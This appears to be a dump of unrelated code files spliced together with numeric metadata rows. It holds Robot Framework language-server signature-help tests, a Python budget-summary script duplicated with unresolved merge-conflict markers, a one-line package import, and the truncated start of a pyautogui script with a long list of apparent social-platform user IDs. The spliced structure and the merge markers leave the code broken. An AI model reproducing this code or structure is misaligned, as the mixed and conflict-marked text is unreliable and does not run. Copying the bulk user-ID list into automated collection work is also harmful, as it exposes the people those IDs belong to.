Log To Console ${arg1} ${arg2}
*** Test Cases ***
Log It
Some keyword arg1""",
)
completion_context = CompletionContext(doc, workspace=workspace.ws)
data_regression.check(signature_help(completion_context))
def test_signature_help_parameters_in_1st_single_space(
workspace, libspec_manager, data_regression
):
from robotframework_ls.impl.completion_context import CompletionContext
from robotframework_ls.impl.signature_help import signature_help
workspace.set_root("case4", libspec_manager=libspec_manager)
doc = workspace.put_doc(
"case4.robot",
"""
*** Keywords ***
Some Keyword
[Arguments] ${arg1} ${arg2}
Log To Console ${arg1} ${arg2}
*** Test Cases ***
Log It
Some keyword arg1 """,
)
completion_context = CompletionContext(doc, workspace=workspace.ws)
data_regression.check(signature_help(completion_context))
def test_signature_help_parameters_in_2nd_two_spaces(
workspace, libspec_manager, data_regression
):
from robotframework_ls.impl.completion_context import CompletionContext
from robotframework_ls.impl.signature_help import signature_help
workspace.set_root("case4", libspec_manager=libspec_manager)
doc = workspace.put_doc(
"case4.robot",
"""
*** Keywords ***
Some Keyword
[Arguments] ${arg1} ${arg2}
Log To Console ${arg1} ${arg2}
*** Test Cases ***
Log It
Some keyword arg1 """,
)
completion_context = CompletionContext(doc, workspace=workspace.ws)
data_regression.check(signature_help(completion_context))
def test_signature_help_parameters_in_2nd_eol(
workspace, libspec_manager, data_regression
):
from robotframework_ls.impl.completion_context import CompletionContext
from robotframework_ls.impl.signature_help import signature_help
workspace.set_root("case4", libspec_manager=libspec_manager)
doc = workspace.put_doc(
"case4.robot",
"""
*** Keywords ***
Some Keyword
[Arguments] ${arg1} ${arg2}
Log To Console ${arg1} ${arg2}
*** Test Cases ***
Log It
Some keyword arg1 """,
)
completion_context = CompletionContext(doc, workspace=workspace.ws)
data_regression.check(signature_help(completion_context))
def test_signature_help_parameters_in_2nd(workspace, libspec_manager, data_regression):
from robotframework_ls.impl.completion_context import CompletionContext
from robotframework_ls.impl.signature_help import signature_help
workspace.set_root("case4", libspec_manager=libspec_manager)
doc = workspace.put_doc(
"case4.robot",
"""
*** Keywords ***
Some Keyword
[Arguments] ${arg1} ${arg2}
Log To Console ${arg1} ${arg2}
*** Test Cases ***
Log It
Some keyword arg1 arg2""",
)
lineno, col = doc.get_last_line_col()
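    # Slide the caret left across the final token: signature help should be
    # stable (identical regression output) for each column the loop visits.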
for i in range(6):
check_col = col - i
completion_context = CompletionContext(
doc, line=lineno, col=check_col, workspace=workspace.ws
)
try:
data_regression.check(signature_help(completion_context))
except:
raise AssertionError(f"Failed on i: {i}")
def test_signature_help_parameters_na(workspace, libspec_manager, data_regression):
from robotframework_ls.impl.completion_context import CompletionContext
from robotframework_ls.impl.signature_help import signature_help
workspace.set_root("case4", libspec_manager=libspec_manager)
doc = workspace.put_doc(
"case4.robot",
"""
*** Keywords ***
Some Keyword
[Arguments] ${arg1} ${arg2}
Log To Console ${arg1} ${arg2}
*** Test Cases ***
Log It
Some keyword arg1 arg2""",
)
# Checking `Some keywor|d | arg1 arg2`
lineno, _col = doc.get_last_line_col()
for check_col in [16, 17]:
completion_context = CompletionContext(
doc, line=lineno, col=check_col, workspace=workspace.ws
)
try:
data_regression.check(signature_help(completion_context))
except:
raise AssertionError(f"Failed on col: {check_col}")
def test_signature_help_parameters_first(workspace, libspec_manager, data_regression):
from robotframework_ls.impl.completion_context import CompletionContext
from robotframework_ls.impl.signature_help import signature_help
workspace.set_root("case4", libspec_manager=libspec_manager)
doc = workspace.put_doc(
"case4.robot",
"""
*** Keywords ***
Some Keyword
[Arguments] ${arg1} ${arg2}
Log To Console ${arg1} ${arg2}
*** Test Cases ***
Log It
Some keyword arg1 arg2""",
)
# Checking `Some keyword | a|rg1 arg2`
lineno, _col = doc.get_last_line_col()
for check_col in [18, 19, 20, 21, 22]:
completion_context = CompletionContext(
doc, line=lineno, col=check_col, workspace=workspace.ws
)
try:
data_regression.check(signature_help(completion_context))
except:
raise AssertionError(f"Failed on col: {check_col}")
def test_signature_help_parameters_switch(workspace, libspec_manager, data_regression):
from robotframework_ls.impl.completion_context import CompletionContext
from robotframework_ls.impl.signature_help import signature_help
workspace.set_root("case4", libspec_manager=libspec_manager)
doc = workspace.put_doc(
"case4.robot",
"""
*** Keywords ***
Some Keyword
[Arguments] ${arg1} ${arg2}
Log To Console ${arg1} ${arg2}
*** Test Cases ***
Log It
Some keyword arg2=m""",
)
completion_context = CompletionContext(doc, workspace=workspace.ws)
data_regression.check(signature_help(completion_context))
def test_signature_help_parameters_star_arg_keyword(
workspace, libspec_manager, data_regression
):
from robotframework_ls.impl.completion_context import CompletionContext
from robotframework_ls.impl.signature_help import signature_help
workspace.set_root("case4", libspec_manager=libspec_manager)
doc = workspace.put_doc(
"case4.robot",
"""
*** Keywords ***
Some Keyword
[Arguments] ${arg1} ${arg2} @{arg3}
Log To Console ${arg1} ${arg2} ${arg3}
*** Test Cases ***
Test case 1
Some Keyword val another foo bar""",
)
completion_context = CompletionContext(doc, workspace=workspace.ws)
data_regression.check(signature_help(completion_context))
def test_signature_help_over_keyword(workspace, libspec_manager, data_regression):
from robotframework_ls.impl.completion_context import CompletionContext
from robotframework_ls.impl.signature_help import signature_help
workspace.set_root("case4", libspec_manager=libspec_manager)
doc = workspace.put_doc(
"case4.robot",
"""
*** Keywords ***
Some Keyword
[Arguments] ${arg1} ${arg2} @{arg3}
Log To Console ${arg1} ${arg2} ${arg3}
*** Test Cases ***
Test case 1
Some Keyword val""",
)
lineno, _col = doc.get_last_line_col()
for check_col in range(4, 17):
completion_context = CompletionContext(
doc, line=lineno, col=check_col, workspace=workspace.ws
)
try:
data_regression.check(signature_help(completion_context))
except:
raise AssertionError(f"Failed on col: {check_col}")
def test_signature_help_parameters_keyword_arg_keyword(
workspace, libspec_manager, data_regression
):
from robotframework_ls.impl.completion_context import CompletionContext
from robotframework_ls.impl.signature_help import signature_help
workspace.set_root("case4", libspec_manager=libspec_manager)
doc = workspace.put_doc(
"case4.robot",
"""
*** Keywords ***
Some Keyword
[Arguments] ${arg1} ${arg2} @{arg3} &{arg4}
Log To Console ${arg1} ${arg2} ${arg3}
*** Test Cases ***
Test case 1
Some Keyword val another foo bar some=1 another=2""",
)
completion_context = CompletionContext(doc, workspace=workspace.ws)
data_regression.check(signature_help(completion_context))
def test_signature_help_parameters_name_after_stararg(
workspace, libspec_manager, data_regression
):
from robotframework_ls.impl.completion_context import CompletionContext
from robotframework_ls.impl.signature_help import signature_help
workspace.set_root("case4", libspec_manager=libspec_manager)
doc = workspace.put_doc(
"case4.robot",
"""
*** Keywords ***
Some Keyword
[Arguments] ${arg1} ${arg2} @{arg3} &{arg4}
Log To Console ${arg1} ${arg2} ${arg3}
*** Test Cases ***
Test case 1
Some Keyword val another foo bar some=1 anot""",
)
# Note: must match last because it's after a keyword arg.
completion_context = CompletionContext(doc, workspace=workspace.ws)
data_regression.check(signature_help(completion_context))
def test_signature_help_parameters_only_stararg(
workspace, libspec_manager, data_regression
):
from robotframework_ls.impl.completion_context import CompletionContext
from robotframework_ls.impl.signature_help import signature_help
workspace.set_root("case4", libspec_manager=libspec_manager)
doc = workspace.put_doc(
"case4.robot",
"""
*** Keywords ***
Keyword only star
[Arguments] @{arg3}
Log To Console ${arg3}
*** Test Cases **
Normal test case
Keyword only star arg1=22 this is ok""",
)
lineno, col = doc.get_last_line_col()
col -= len("1=22 this is ok")
completion_context = CompletionContext(
doc, workspace=workspace.ws, line=lineno, col=col
)
data_regression.check(signature_help(completion_context))
def test_signature_help_parameters_named_and_stararg(
workspace, libspec_manager, data_regression
):
from robotframework_ls.impl.completion_context import CompletionContext
from robotframework_ls.impl.signature_help import signature_help
workspace.set_root("case4", libspec_manager=libspec_manager)
doc = workspace.put_doc(
"case4.robot",
"""
*** Keywords ***
Keyword only star
[Arguments] ${arg1} @{arg3}
Log To Console ${arg3}
*** Test Cases **
Normal test case
Keyword only star arg1 arg1=22 this is ok""",
)
lineno, col = doc.get_last_line_col()
col -= len("1=22 this is ok")
completion_context = CompletionContext(
doc, workspace=workspace.ws, line=lineno, col=col
)
data_regression.check(signature_help(completion_context))
def test_signature_help_parameters_name_star_even_with_eq(
workspace, libspec_manager, data_regression
):
from robotframework_ls.impl.completion_context import CompletionContext
from robotframework_ls.impl.signature_help import signature_help
workspace.set_root("case4", libspec_manager=libspec_manager)
doc = workspace.put_doc(
"case4.robot",
"""
*** Keywords ***
Some Keyword
[Arguments] ${arg1} ${arg2} @{arg3}
Log To Console ${arg1} ${arg2} ${arg3}
*** Test Cases ***
Test case 1
Some Keyword val another foo bar some=1 anot""",
)
# Note: must match last because it's after a keyword arg.
completion_context = CompletionContext(doc, workspace=workspace.ws)
data_regression.check(signature_help(completion_context))
def test_signature_help_parameters_star_arg(
workspace, libspec_manager, data_regression
):
from robotframework_ls.impl.completion_context import CompletionContext
from robotframework_ls.impl.signature_help import signature_help
workspace.set_root("case_argspec", libspec_manager=libspec_manager)
doc = workspace.put_doc(
"my.robot",
"""
*** Settings ***
Library case_argspec.py
*** Test Cases ***
Check
arg_with_starargs arg1 arg2 in_star in_star2""",
)
completion_context = CompletionContext(doc, workspace=workspace.ws)
data_regression.check(signature_help(completion_context))
def test_signature_help_parameters_keyword_arg(
workspace, libspec_manager, data_regression
):
from robotframework_ls.impl.completion_context import CompletionContext
from robotframework_ls.impl.signature_help import signature_help
workspace.set_root("case_argspec", libspec_manager=libspec_manager)
doc = workspace.put_doc(
"my.robot",
"""
*** Settings ***
Library case_argspec.py
*** Test Cases ***
Check
arg_with_starargs arg1 arg2 in_star in_star2 some_val=22""",
)
completion_context = CompletionContext(doc, workspace=workspace.ws)
data_regression.check(signature_help(completion_context))
def test_signature_help_parameters_misleading_match_1(
workspace, libspec_manager, data_regression
):
from robotframework_ls.impl.completion_context import CompletionContext
from robotframework_ls.impl.signature_help import signature_help
workspace.set_root("case4", libspec_manager=libspec_manager)
doc = workspace.put_doc(
"my.robot",
"""
*** Keywords ***
Keyword named and keyword
[Arguments] ${arg1} @{arg3} &{arg4}
Log to console 22 @{arg3} &{arg4}
*** Test Cases **
Normal test case
Keyword named and keyword arg1=ok arg3=keyword arg4=arg4""",
)
lineno, col = doc.get_last_line_col()
# We're actually matching the kwargs, not star args...
col -= len("3=keyword arg4=arg4")
completion_context = CompletionContext(
doc, workspace=workspace.ws, line=lineno, col=col
)
data_regression.check(signature_help(completion_context))
def test_signature_help_library_basic(workspace, libspec_manager, data_regression):
from robotframework_ls.impl.completion_context import CompletionContext
from robotframework_ls.impl.signature_help import signature_help
workspace.set_root("case4", libspec_manager=libspec_manager)
doc = workspace.put_doc(
"my.robot",
"""
*** Settings ***
Library Collections""",
)
completion_context = CompletionContext(doc, workspace=workspace.ws)
sig_help = signature_help(completion_context)
documentation = sig_help["signatures"][0].pop("documentation")
assert documentation["kind"] == "markdown"
assert "Collections is Robot Framework's standard library" in documentation["value"]
data_regression.check(sig_help)
def test_signature_help_library_with_params(
workspace, libspec_manager, data_regression
):
from robotframework_ls.impl.completion_context import CompletionContext
from robotframework_ls.impl.signature_help import signature_help
from robotframework_ls.robot_config import RobotConfig
config = RobotConfig()
config.update(
{"robot": {"libraries": {"libdoc": {"needsArgs": ["LibWithParams"]}}}}
)
libspec_manager.config = config
workspace.set_root("case_params_on_lib", libspec_manager=libspec_manager)
doc = workspace.put_doc("case_params_on_lib.robot")
doc.source = """
*** Settings ***
Library LibWithParams some_param=foo"""
completion_context = CompletionContext(doc, workspace=workspace.ws)
sig_help = signature_help(completion_context)
documentation = sig_help["signatures"][0].pop("documentation")
assert documentation["kind"] == "markdown"
# assert "Collections is Robot Framework's standard library" in documentation["value"]
data_regression.check(sig_help)
def test_signature_help_library_with_params_active_arg(
workspace, libspec_manager, data_regression
):
from robotframework_ls.impl.completion_context import CompletionContext
from robotframework_ls.impl.signature_help import signature_help
workspace.set_root("case_params_on_lib", libspec_manager=libspec_manager)
doc = workspace.put_doc("case_params_on_lib.robot")
doc.source = """
*** Settings ***
Library AnotherLibWithParams param1=foo param2=bar"""
completion_context = CompletionContext(doc, workspace=workspace.ws)
sig_help = signature_help(completion_context)
documentation = sig_help["signatures"][0].pop("documentation")
assert documentation["kind"] == "markdown"
data_regression.check(sig_help)
| 31.761168
| 90
| 0.702191
| 2,120
| 18,485
| 5.866038
| 0.080189
| 0.096172
| 0.075587
| 0.088775
| 0.930926
| 0.921277
| 0.918865
| 0.90825
| 0.908009
| 0.908009
| 0
| 0.013444
| 0.199243
| 18,485
| 581
| 91
| 31.815835
| 0.826713
| 0.023641
| 0
| 0.703704
| 0
| 0
| 0.066467
| 0.003351
| 0
| 0
| 0
| 0
| 0.033951
| 1
| 0.070988
| false
| 0
| 0.148148
| 0
| 0.219136
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2b065e78c44f1201e4ab36e0d1276a9494e1810d
| 6,548
|
py
|
Python
|
PyBank/main.py
|
kekelee0714/python_challenge
|
102ef56690fb896def98b525b73d4e77459d9a98
|
[
"ADSL"
] | null | null | null |
PyBank/main.py
|
kekelee0714/python_challenge
|
102ef56690fb896def98b525b73d4e77459d9a98
|
[
"ADSL"
] | null | null | null |
PyBank/main.py
|
kekelee0714/python_challenge
|
102ef56690fb896def98b525b73d4e77459d9a98
|
[
"ADSL"
] | null | null | null |
#load csv
import os
import csv
#Path to collect data
budget_data_csv ="C:/Users/Keke/git/python_challenge/PyBank/Resources/budget_data.csv"
#define variables
totalmonths=0
#set total as integer
nettotalamount=0
#calculate changes of each date
netmonthlychange=[]
#set first value as 0 from previous row
original = 0
averagechange=0
a=0
#set variables as list with "" reps date and numbers as the only value in the list
Gincrease= ["", 0]
Gdecrease= ["", 999999999999]
#read csv file
with open(budget_data_csv) as csvfile:
csvreader=csv.reader(csvfile,delimiter=",")
#skip header line to start from row 2
csv_header=next(csvfile)
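    #note: next(csvfile) consumed the raw header line above, so the reader
    #below starts at the first data row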
#title of hw
print(f"Financial Analysis")
#print a new line \n
print("\n-------------------------------------")
#loop the numbers
    for row in csvreader:
#date=row[0]
#profitloss=row[1]
#next row value is value in previous row add next row value
totalmonths = totalmonths+1
#sum incremental values
nettotalamount = nettotalamount + int(row[1])
#calculate average change, if there is no value before first row or value is 0
if original == 0:
#no original value exists
#netmonthlychange.append(0) starts from 0 is added to the column in the file
#original which is 0 equals to the new row value
original = int(row[1])
else:
#original value exists, the new row value subtract previous row value is the difference
a = int(row[1]) - original
#append the net monthly change as a column
netmonthlychange.append(a)
original = int(row[1])
        #if the latest change exceeds the stored maximum, record its date (row[0]) and value; the mirror check below tracks the greatest decrease
if a > Gincrease[1]:
Gincrease[0] = row[0]
Gincrease[1] = a
if a < Gdecrease[1]:
Gdecrease[0] = row[0]
Gdecrease[1] = a
#calculate the average of changes in total row
averagechange = sum(netmonthlychange)/len(netmonthlychange)
print(f"Total Months:{totalmonths}")
print(f"Total:${nettotalamount}")
#print(netmonthlychange)
#format average change to 2 decimal
print(f"Average Change:${averagechange:,.2f}".format(averagechange))
# [0] is date value, [1] is max or min value in the list
print(f"Greatest Increase in Profits:{Gincrease[0]}:(${Gincrease[1]})")
print(f"Greatest Decrease in Profits:{Gdecrease[0]}:(${Gdecrease[1]})")
# Generate Output Summary
text =(
f"Financial Analysis\n"
f"----------------------------\n"
f"Total Months: {totalmonths}\n"
f"Total: ${nettotalamount}\n"
f"Average Change: ${averagechange:.2f}\n"
f"Greatest Increase in Profits: {Gincrease[0]} (${Gincrease[1]})\n"
f"Greatest Decrease in Profits: {Gdecrease[0]} (${Gdecrease[1]})\n")
# Export the results to text file
saveFile= open('C:/Users/Keke/git/python_challenge/PyBank/analysis/saveFile.txt', 'w')
saveFile.write(text)
=======
#load csv
import os
import csv
#Path to collect data
budget_data_csv ="C:/Users/Keke/git/python_challenge/PyBank/Resources/budget_data.csv"
#define variables
totalmonths=0
#set total as integer
nettotalamount=0
#calculate changes of each date
netmonthlychange=[]
#set first value as 0 from previous row
original = 0
averagechange=0
a=0
#set variables as list with "" reps date and numbers as the only value in the list
Gincrease= ["", 0]
Gdecrease= ["", 999999999999]
#read csv file
with open(budget_data_csv) as csvfile:
csvreader=csv.reader(csvfile,delimiter=",")
#skip header line to start from row 2
csv_header=next(csvfile)
#title of hw
print(f"Financial Analysis")
#print a new line \n
print("\n-------------------------------------")
#loop the numbers
for row in csv.reader(csvfile):
#date=row[0]
#profitloss=row[1]
#next row value is value in previous row add next row value
totalmonths = totalmonths+1
#sum incremental values
nettotalamount = nettotalamount + int(row[1])
#nettotalamount+= int(totalmonths
#calculate average change, if there is no value before first row or value is 0
if original == 0:
#no original value exists
#netmonthlychange.append(0) starts from 0 is added to the column in the file
#original which is 0 equals to the new row value
original = int(row[1])
else:
#original value exists, the new row value subtract previous row value is the difference
a = int(row[1]) - original
#append the net monthly change as a column
netmonthlychange.append(a)
original = int(row[1])
#if the value in net monthly change is greater the the only value, then column [0] is date column, column 2 [1] with greatest increase is value a from net monthly change
if a > Gincrease[1]:
Gincrease[0] = row[0]
Gincrease[1] = a
if a < Gdecrease[1]:
Gdecrease[0] = row[0]
Gdecrease[1] = a
#calculate the average of changes in total row
averagechange = sum(netmonthlychange)/len(netmonthlychange)
print(f"Total Months:{totalmonths}")
print(f"Total:${nettotalamount}")
#print(netmonthlychange)
#format average change to 2 decimal
print(f"Average Change:${averagechange:,.2f}".format(averagechange))
# [0] is date value, [1] is max or min value in the list
print(f"Greatest Increase in Profits:{Gincrease[0]}:(${Gincrease[1]})")
print(f"Greatest Decrease in Profits:{Gdecrease[0]}:(${Gdecrease[1]})")
# Generate Output Summary
text =(
f"Financial Analysis\n"
f"----------------------------\n"
f"Total Months: {totalmonths}\n"
f"Total: ${nettotalamount}\n"
f"Average Change: ${averagechange:.2f}\n"
f"Greatest Increase in Profits: {Gincrease[0]} (${Gincrease[1]})\n"
f"Greatest Decrease in Profits: {Gdecrease[0]} (${Gdecrease[1]})\n")
# Export the results to text file
saveFile= open('C:/Users/Keke/git/python_challenge/PyBank/analysis/saveFile.txt', 'w')
saveFile.write(text)
>>>>>>> 97012a5334b31988da5776f6a60bc53f1646e686
saveFile.close()
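The Gincrease/Gdecrease bookkeeping above tracks the extremes by hand; the same result can be read off the list of monthly changes with max() and min(). A minimal sketch, assuming the same two-column (date, profit/loss) layout; greatest_changes and the example values are illustrative, not part of the original script.

# Sketch: compute the greatest monthly increase and decrease with max()/min(),
# assuming the same two-column (date, profit/loss) layout as budget_data.csv.
def greatest_changes(dates, amounts):
    """Return the (date, change) pairs of the greatest increase and decrease."""
    # Month-over-month changes, paired with the date the change landed on
    changes = [(dates[i], amounts[i] - amounts[i - 1]) for i in range(1, len(amounts))]
    increase = max(changes, key=lambda pair: pair[1])
    decrease = min(changes, key=lambda pair: pair[1])
    return increase, decrease

# Example with made-up numbers:
# greatest_changes(["Jan", "Feb", "Mar"], [100, 300, 50])
# -> (('Feb', 200), ('Mar', -250))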
| 30.598131
| 177
| 0.633323
| 870
| 6,548
| 4.748276
| 0.145977
| 0.017429
| 0.013556
| 0.012588
| 0.986202
| 0.986202
| 0.986202
| 0.986202
| 0.986202
| 0.986202
| 0
| 0.028681
| 0.243891
| 6,548
| 214
| 178
| 30.598131
| 0.805696
| 0.361637
| 0
| 0.959184
| 0
| 0
| 0.324193
| 0.170832
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.040816
| null | null | 0.142857
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
2b2a8d2f1cd6bf4fffe70b1a22108f94c6e975da
| 46
|
py
|
Python
|
markdown_strikethrough/__init__.py
|
codejamninja/markdown-strikethrough
|
7777da3c0e801328c31faeff486356bf20d12078
|
[
"MIT"
] | 2
|
2019-09-09T03:54:15.000Z
|
2020-08-08T20:44:16.000Z
|
markdown_strikethrough/__init__.py
|
codejamninja/markdown-strikethrough
|
7777da3c0e801328c31faeff486356bf20d12078
|
[
"MIT"
] | 1
|
2020-08-08T20:44:34.000Z
|
2020-08-11T19:52:36.000Z
|
markdown_strikethrough/__init__.py
|
codejamninja/markdown-strikethrough
|
7777da3c0e801328c31faeff486356bf20d12078
|
[
"MIT"
] | 1
|
2020-08-07T14:00:00.000Z
|
2020-08-07T14:00:00.000Z
|
from .extension import StrikethroughExtension
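For context on how the re-exported extension would be consumed: python-markdown extensions are passed to markdown.markdown via the extensions argument. A minimal usage sketch; the assumption that StrikethroughExtension renders ~~...~~ as <del> tags is inferred from the package name, not confirmed by the source shown here.

# Usage sketch -- assumes StrikethroughExtension follows the standard
# python-markdown Extension API.
import markdown
from markdown_strikethrough import StrikethroughExtension

html = markdown.markdown('~~struck~~', extensions=[StrikethroughExtension()])
print(html)  # presumably '<p><del>struck</del></p>' if the assumption holds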
| 23
| 45
| 0.891304
| 4
| 46
| 10.25
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.086957
| 46
| 1
| 46
| 46
| 0.97619
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
2b2ae429014f1501359c41d45624e957ae5aab18
| 26,275
|
py
|
Python
|
get_person_json.py
|
nameoruser/qianshanghua_tech_open
|
f29d829bc0957b7aff5e4335815f79a1d6f00482
|
[
"MIT"
] | null | null | null |
get_person_json.py
|
nameoruser/qianshanghua_tech_open
|
f29d829bc0957b7aff5e4335815f79a1d6f00482
|
[
"MIT"
] | null | null | null |
get_person_json.py
|
nameoruser/qianshanghua_tech_open
|
f29d829bc0957b7aff5e4335815f79a1d6f00482
|
[
"MIT"
] | null | null | null |
import pyautogui
userIds=["563f28159eb5785cf3ff166c","57da039b5e87e7060078bd61","5cff5b5e0000000005001da2","597a92ff5e87e72aabdbfb68","566ae0e050c4b472ce971b00","5a0172ef4eacab059a3a9c96","54cdc001b4c4d615fc2c95ec","56585ef8e00dd87ff58fdbd8","58c740786a6a6901380c8480","55b99885e4b1cf545ecf9fce","5a2f4cb611be1021706678ef","5a9a74dd11be1053476212dd","5757c6546a6a6967b0730cad","5a9a3b754eacab47c3680df3","5571cf185894466e59c566f3","5655cb4344760876429b06e0","5c4a9b60000000001102a270","56ab5a695e87e733fe4bda44","5a7d3eec11be1021babbad85","5af67a23f7e8b97f0b7b04b8","5901ea6a50c4b46ce1182469","56d4511f1c07df32ddb07c9a","5bdd03f84c8ea300013ad4b2","5ab9fc3911be10774482ae0f","5bc6a5284884420001879b77","5df1a2b5000000000100a24d","5adc140911be1034034992eb","598d00d650c4b463941d63cc","5fd1c6c70000000001005681","5bcfed37f7e8b955ad4e916c","5a609d06e8ac2b4a9ce0c79b","5ce9df3f0000000011012ccc","57b3d74750c4b4624311f37e","5e613a6c0000000001004cf1","5a0bab2911be104f78a9230a","599f81f982ec391ca874a0d2","55d6d2b3a75c9544daac8058","57fd60c182ec390c1e0f6cb5","54eb29e4b4c4d650c7732980","55af65c9b7ba224c5ed8f6d3","555ee08da75c9576181cb63a","5ae28f464eacab3f46af145a","5a06d5b94eacab1c49c097d3","5995cdb382ec391ce28fbeb7","572161431c07df59c9d94975","5e8da3290000000001002d8a","565be62c82ec395615edacdb","5b0acec6e8ac2b1d53fa311b","5b5c0d33f7e8b90468fedd57","591acb5050c4b476602a3b2d","5a31e26fe8ac2b040ac04c85","5cd27dc8000000001000e5f0","552e10504fac63071dd3a4c5","5cff3a8500000000100012ce","5bba31d1ef3da50001c87bc1","5af59aa7e8ac2b7ae517f4a7","5a922caf4eacab36f1ad3346","599bc4f782ec390211a326e3","5d16f0a70000000012017775","598ef91a50c4b4689e942bb1","5539f269a46e962ef6005f9b","5dce45ad000000000100a111","5ddb43310000000001009856","5754fc7fbd0da54dda1a6896","5b5c91394eacab2dc2e4b67b","5a5eb0be11be105e04c4219c","5a8175b34eacab76003f5fb6","5f0e92d40000000001006b4f","5a8ece36e8ac2b259e57c91e","5c5bc879000000001801ed22","5a9679f611be1001e369ced3","58a5cb7c50c4b42857d166df","5617104562a60c09001dc969","5970495050c4b440fab52a1e","5cac275000000000120110cc","557160a024caa94557abfcac","5b63c87a08c322000140bed4","5480c804d6e4a9617b3014c4","5d2c3ff700000000120122ce","5d669cb1000000000101a0c5","56a895696a6a697ddc45719d","579b0c3b5e87e722a8af1610","59c747ee51783a0e35f879fa","5cdf4e9300000000170309e4","57b3254582ec3927d6949683","53356c0cb4c4d6656353a716","5d28384b00000000110366f7","5c035b0a00000000050046dc","581c976b82ec394bf0ba13af","5a4b93b34eacab3dc234c586","5cce4ce5000000001002027b","5858ebcc50c4b4147db4ed85","5976f9946a6a6904e6bde0ab","59dc26d044363b68d30f96ee","5bf7d30643e93c0001a852b8","5e65f4de0000000001004de0","598d61d86a6a692151a604cc","5c53fe600000000012038495","5657a8da9eb5783699f75da6","588e060a5e87e725587b0c9b","5ef800fa00000000010045d6","5a50e0984eacab1bfc31087f","5bf3d856ca31f80001b035cf","5e0082300000000001007219","5a4ba04ae8ac2b786b4eaf31","5a7ed930e8ac2b3cc82471e6","55e08eb6f5a26310fe15ada0","55037bd24fac637a9e80c750","54e8ac524fac63087d232070","5c33530300000000050115c6","5a0327334eacab720e5c713d","5d3571b0000000001603950a","5ac0f50f4eacab533a46a1f3","5a6ac91be8ac2b0cf57a50ec","5dd27576000000000100911f","5483b6e0e779895b7a18dbcf","5fabeded0000000001000bf9","59f6f411e8ac2b675f255952","5ac073f111be10046a0a023e","5ab0f1844eacab5fca6a0d65","5a1e2c62e8ac2b65158d0d72","5b69064f8f77470001f76cef","5b091bb74eacab61e4a9d0fe","5c96292d0000000011012730","5bfd37bb44363b1be89a8fe6","55701259e4b1cf643bc616ca","56af7a795e87e707bdc12a24","59effbc4e8ac2b2a3d82343a","5806b64682ec39270c247826","55fba5ca67bc656d0f39452b","57f2141e82ec396fac202951","55845e42
62a60c325b608777","5aa4974be8ac2b1056ae133f","5ad9e2bde8ac2b42af7c3c3a","5bb236857d87110001e001c5","57ae9e2082ec396b21793684","5908181382ec397a00393ba3","5eaa701c0000000001006489","5c94bd3400000000160124bb","59ed4a1511be104fc73f36da","571f70d984edcd1213d213e2","57c9072e82ec392a4f737b12","5832b75a82ec396f2bea5d71","59166d8782ec397fbfd6b8e2","57f63af1bd0da55096c5e7f8","5ddba4e00000000001007335","5cdbb6b70000000012010d2f","5655892fe58d1344c0a2012f","5a320b0a11be102e5eb9b687","5e047cf200000000010055b4","5a353395e8ac2b7890db40b6","562f7175a40e1863293f9f52","5721db9084edcd524b9a8d61","5a8a30864eacab147a5dfd83","5936447382ec394236429ffe","5acdd212e8ac2b3476131a40","54f30c05b4c4d61b230995d4","596a31495e87e769bf0147af","5593d4d7b7ba224230748099","5837b6b06a6a6970cd2a47ea","5e8ed5dc000000000100bdbb","5a6eb5c111be1025c07e36a3","578f3c365e87e774dffe9000","5ca18842000000001001b7c1","531c1180b4c4d67408811a20","5dcb9feb000000000100999a","5eba3f0c0000000001006a98","5cb712f100000000100165f7","5e92a01b000000000100890e","5f0dc7a3000000000100097e","5ca6377b00000000160113cf","5837a6e150c4b40c2616f999","54ed94264fac632d92b853f7","54e722dad39ea214c11ebbdc","555cadf8b7ba227688cb4512","5888146c50c4b4689bf36e73","5b4b5778e8ac2b2eb4caee1d","5cff7d150000000016036964","560a5c4f484fb6036a169a12","5873544d5e87e7416aa1db4e","5a52d2aa11be1051a8fc03a3","565151199eb578461e4fd582","587e0c595e87e72c8e2ef1db","5a7717b4e8ac2b2b060b9526","59f048d44eacab475bee4098","56c1e4f8b8c8b45044e6c4fe","57f840de5e87e77b344d51fb","54d8efa52e1d9370188360f4","5d0af5120000000016034bfd","5a64aab811be106cfd490ce1","554d64984fac6319f93d3143","5a71275011be102a9e773d90","5e68bdb8000000000100ba06","5b5d8a604eacab24d8cb66aa","54d80a4a2e1d9366f1fc8c1a","579f66b682ec392318dad198","5af3be9fe8ac2b2a387db3b5","5a424d6c11be10029e6d503f","5ba84580a5bcc00001ec1ce1","58f0a79c6a6a6945d25fa1ba","5d072ed0000000001101ff74","5b309a09e8ac2b01364e3793","5941db1a50c4b436a21b0c6a","5bb36db5f2407b0001560e2d","5a7b2191e8ac2b04599a1510","5821cf725e87e729c9728029","5586a701484fb66a82219c1b","5e5cb766000000000100b8b8","5a68599ce8ac2b02d75eaf7a","5c935a050000000010014343","58938c4882ec3955e302b5c4","5c4711520000000010032881","5b436c3111be1002d61eac9f","58ef9a765e87e74cf10eca20","56356bdbe00dd87ff3d9adc4","5c0e326e000000000703b08c","5c167d2300000000050314f2","58fabdae82ec397d484fa6ca","57210827aed758497fd68a3e","5a9ac646e8ac2b796565f73b","56a0543acb35fb2225975fd2","5c25c4c5000000000502790d","5612accf3f95a31870230fe1","598fe73e5e87e70500b899af","5f2906c5000000000100922f","5888b99050c4b45fb6d3502b","5f58d6e5000000000100b637","5abcaf654eacab3b61830e61","5996f44082ec3909818fbf7b","579